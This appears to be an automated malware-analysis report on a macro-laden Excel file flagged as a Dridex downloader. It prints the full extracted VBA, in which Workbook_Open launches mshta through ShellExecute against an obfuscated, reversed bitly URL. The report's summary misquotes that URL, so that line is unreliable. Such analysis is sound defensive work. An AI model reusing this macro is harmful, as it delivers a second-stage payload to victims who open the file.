MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File: User Execution
The VBA macro contains a Workbook_Open subroutine that uses CreateObject to instantiate a Shell.Application object. This object is then used to call ShellExecute with a reversed URL, 'http://www.bitly.com/hayiwsjki/', which likely serves as a download location for a second-stage payload. The ClamAV detection name 'Xls.Downloader.DridexGreen09211-9890102-0' strongly suggests the Dridex family.
Heuristics 6
-
ClamAV: Xls.Downloader.DridexGreen09211-9890102-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.DridexGreen09211-9890102-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/cuis.b)
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1666 bytes |
SHA-256: 0a057c7021710ddc587c16577bf609c57c03b013aa8a9ce79c69b7dd02627a54 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "biilli"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function comanno()
comanno = (VBA.StrReverse("athsm"))
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub _
Workbook_Open _
()
phul _
. _
coomon _
. _
ShellExecute# biilli _
. _
comanno _
, bababa _
. _
kaoskdaosdk
End _
Sub
Attribute VB_Name = "bababa"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function _
kaoskdaosdk _
()
kaoskdaosdk _
= _
(VBA _
. _
StrReverse("isjkwdhjiyawe/moc.yltib.www//:sptth"))
End Function
Attribute VB_Name = "phul"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function _
coomon _
()
Set _
coomon _
= _
VBA _
. _
CreateObject("Shell.Application")
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/cuis.b | 24064 bytes |
SHA-256: 59cb9ced3b634b1a1e5c01662db25b3078bc1eee46772238d88b5852ffb72ed5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.